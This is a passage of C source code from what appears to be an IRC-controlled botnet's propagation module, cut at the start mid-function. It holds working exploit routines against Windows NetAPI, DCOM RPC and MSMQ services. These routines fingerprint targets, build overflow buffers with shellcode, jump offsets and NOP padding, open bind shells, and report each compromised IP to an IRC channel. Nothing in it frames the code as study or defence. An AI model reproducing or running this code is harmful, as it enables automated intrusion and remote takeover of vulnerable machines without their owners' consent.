{
fclosesocket(sockfd);
return FALSE;
}
if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)
{
fclosesocket(sockfd);
return FALSE;
}
if ((len=frecv(sockfd, recvbuf, 1600, 0))==SOCKET_ERROR)
{
fclosesocket(sockfd);
return FALSE;
}
switch (iHostOS)
{
case OS_WINXP:
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Trying to exploit IP: %s (XP)", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
if (Exploit(exinfo,sockfd,TARGET_XP))
bsuccess = TRUE;
break;
case OS_WIN2K:
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Trying to exploit IP: %s (2K)", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
if (!Exploit(exinfo,sockfd,TARGET_2KA))
{
if (Exploit(exinfo,sockfd,TARGET_2K))
bsuccess = TRUE;
}
else
bsuccess = TRUE;
break;
default:
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Trying to exploit IP: %s", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
if (!Exploit(exinfo,sockfd,TARGET_XP))
{
if (!Exploit(exinfo,sockfd,TARGET_2KA))
{
if (Exploit(exinfo,sockfd,TARGET_2K))
bsuccess = TRUE;
}
else
bsuccess = TRUE;
} else
bsuccess = TRUE;
break;
}
fclosesocket(sockfd);
if (bsuccess)
{
exploit[exinfo.exploit].stats++;
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
// else
// if (!exinfo.silent && exinfo.verbose)
// irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
return TRUE;
}
void netapi(ExploitInfo_s* pExploitInfo)
{
NETRESOURCE NtRes;
HANDLE hFile;
char szUnc[MAX_PATH];
char szPipe[MAX_PATH];
char szResponse[MAX_PATH];
int nCount;
DWORD dwValue;
DWORD dwTarget = 0x00020804;
char szShellcode[512];
DWORD dwShellcodeSize = GenerateEncodedShellcode(szShellcode, sizeof(szShellcode),
dwShellcodeIpAddress, usShellcodePort,
pExploit[pExploitInfo->dwExploitId].dwExploitId, "\r\n\\_/.", sizeof("\r\n\\_/."));
if (!dwShellcodeSize)
ExitThread(0);
// Determine remote OS
int iTargetOS = FpHost(pExploitInfo->dwRemoteIp, FP_RPC);
if(!iTargetOS)
iTargetOS = FpHost(pExploitInfo->dwRemoteIp, FP_PORT5K);
if(!iTargetOS)
iTargetOS = OS_WIN2K;
ZeroMemory(szStub, sizeof(szStub));
memset(szPath, '\x90', sizeof(szPath));
sprintf(szUnc, "\\\\%s\\PIPE", GetIP(pExploitInfo->dwRemoteIp));
sprintf(szPipe, "\\\\%s\\PIPE\\BROWSER", GetIP(pExploitInfo->dwRemoteIp));
NtRes.dwType = RESOURCETYPE_ANY;
NtRes.lpLocalName = NULL;
NtRes.lpRemoteName = szUnc;
NtRes.lpProvider = NULL;
if (WNetAddConnection2(&NtRes, "", "", 0) != ERROR_SUCCESS) {
ExitThread(0);
}
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
ExitThread(0);
}
if (!TransactNamedPipe(hFile, &RPCBind, sizeof(RPCBind) - 1, szResponse, sizeof(szResponse), &dwValue, NULL)) {
ExitThread(0);
}
if(iTargetOS == OS_WIN2K || iTargetOS == OS_WINNT){
memcpy(szPath + 600, szShellcode, dwShellcodeSize);
for (nCount = 0; nCount < 16; nCount++) {
memcpy(szPath + 1000 + (nCount * 4), &dwTarget, 4);
}
dwValue = 1152;
memcpy(&RPCRequest[8], &dwValue, 2);
dwValue = 1124;
memcpy(&RPCRequest[16], &dwValue, 2);
memcpy(szStub, &RPCRequest, 24);
memcpy(szStub + 24, "\x01\x00\x00\x00", 4);
memcpy(szStub + 28, "\x01\x00\x00\x00", 4);
memcpy(szStub + 32, "\x00\x00\x00\x00", 4);
memcpy(szStub + 36, "\x01\x00\x00\x00", 4);
memcpy(szStub + 40, "\x00\x00\x00\x00", 4);
memcpy(szStub + 44, "\x15\x02\x00\x00", 4);
memcpy(szStub + 48, "\x00\x00\x00\x00", 4);
memcpy(szStub + 52, "\x15\x02\x00\x00", 4);
memcpy(szStub + 56, &szPath, 1064);
memcpy(szStub + 1124, "\x01\x00\x00\x00", 4);
memcpy(szStub + 1128, "\x02\x00\x00\x00", 4);
memcpy(szStub + 1132, "\x00\x00\x00\x00", 4);
memcpy(szStub + 1136, "\x02\x00\x00\x00", 4);
memcpy(szStub + 1140, "\xeb\x02\x00\x00", 4);
memcpy(szStub + 1144, "\x01\x00\x00\x00", 4);
memcpy(szStub + 1148, "\x00\x00\x00\x00", 4);
TransactNamedPipe(hFile, szStub, 1152, szResponse, sizeof(szResponse), &dwValue, NULL);
} else if(iTargetOS == OS_WINXP) {
memcpy(szPath, szShellcode, dwShellcodeSize);
dwValue = dwTarget + 6;
memcpy(szPath + 612, &dwValue, 4);
memcpy(szPath + 624, &dwTarget, 4);
memcpy(szPath + 660, &dwTarget, 4);
memcpy(szPath + 672, &dwTarget, 4);
memcpy(szPath + 708, "\x00\x00", 2);
dwValue = 796;
memcpy(&RPCRequest[8], &dwValue, 2);
dwValue = 772;
memcpy(&RPCRequest[16], &dwValue, 2);
memcpy(szStub, &RPCRequest, 24);
memcpy(szStub + 24, "\x01\x00\x00\x00", 4);
memcpy(szStub + 28, "\x01\x00\x00\x00", 4);
memcpy(szStub + 32, "\x00\x00\x00\x00", 4);
memcpy(szStub + 36, "\x01\x00\x00\x00", 4);
memcpy(szStub + 40, "\x00\x00\x00\x00", 4);
memcpy(szStub + 44, "\x63\x01\x00\x00", 4);
memcpy(szStub + 48, "\x00\x00\x00\x00", 4);
memcpy(szStub + 52, "\x63\x01\x00\x00", 4);
memcpy(szStub + 56, &szPath, 710);
memcpy(szStub + 768, "\x01\x00\x00\x00", 4);
memcpy(szStub + 772, "\x01\x00\x00\x00", 4);
memcpy(szStub + 776, "\x00\x00\x00\x00", 4);
memcpy(szStub + 780, "\x01\x00\x00\x00", 4);
memcpy(szStub + 784, "\x00\x00\x00\x00", 4);
memcpy(szStub + 788, "\x01\x00\x00\x00", 4);
memcpy(szStub + 792, "\x00\x00\x00\x00", 4);
TransactNamedPipe(hFile, szStub, 796, szResponse, sizeof(szResponse), &dwValue, NULL);
if (dwValue) {
TransactNamedPipe(hFile, szStub, 796, szResponse, sizeof(szResponse), &dwValue, NULL);
}
} else
return;
ExitThread(1);
}
BOOL dcom2(EXINFO exinfo)
{
char sendbuf[IRCLINE],*pTemp;
char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096];
int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0;
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR) return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename);
if (!iShellSize) return 0;
iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1);
memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf);
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szShellBuf, iShellSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 );
iLoadSize = iPos; iPos = 0;
pTemp = szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12;
// connect with target IP
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr==-1) { // connect failed, exit
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
// read reply
frecv(sSocket, szRecvBuf, 4096, 0);
// Check for DCE_PKT_BINDACK
if (szRecvBuf[2] != DCE_PKT_BINDACK) {
fclosesocket(sSocket);
return FALSE;
}
// send evil request
if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
// read reply
frecv(sSocket, szRecvBuf, 4096, 0);
if (szRecvBuf[2] == DCE_PKT_FAULT) {
fclosesocket(sSocket);
return FALSE;
}
fclosesocket(sSocket);
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL MSMQ(EXINFO exinfo)
{
if(!fNetWkstaGetInfo) { return FALSE; }
char* cname;
char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
char *packet = NULL;
unsigned short bindport;
unsigned long cnt;
struct sockaddr_in addr;
int len, cpkt = 1;
int sockfd;
char recvbuf[4096];
char *buff, *ptr;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0)
return FALSE;
addr.sin_family = AF_INET;
addr.sin_port = fhtons(exinfo.port);
addr.sin_addr.s_addr = finet_addr(exinfo.ip);
memset(&(addr.sin_zero), '\0', 8);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0)
return FALSE;
packet = dce_rpc_bind(0, endp, 1, &cnt);
if (fsend(sockfd, packet, cnt, 0) == -1) { free(packet); return FALSE; }
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 0) { free(packet); return FALSE; }
cname = GetRemoteComputerName(exinfo.ip);
if(strlen(cname) == 0) { return FALSE; }
buff = (char *) malloc(4172);
memset(buff, NOP, 4172);
ptr = buff;
memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
ptr += sizeof(dce_rpc_header1)-1;
msmq_convert_name(ptr, cname);
ptr += strlen(cname)*2;
memcpy(ptr, tag_private, sizeof(tag_private)-1);
ptr += sizeof(tag_private)-1;
memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);
ptr = buff;
ptr += 438;
memcpy(ptr, offsets, sizeof(offsets)-1);
ptr += sizeof(offsets)-1;
int bp = brandom(1337,65535);
bindport = (unsigned short)bp;
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
buff[4170] = '\0';
buff[4171] = '\0';
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if(TargetOS == OS_WIN2K) cpkt = 8;
if(TargetOS == OS_WINXP) cpkt = 1;
while (cpkt--) {
if (fsend(sockfd, buff, 4172, 0) == -1) {
return FALSE;
}
}
fclosesocket(sockfd);
Sleep(500);
free(buff);
if(ConnectShellEx(exinfo, bp) == true) { exploit[exinfo.exploit].stats++; return TRUE;}
return FALSE;
}
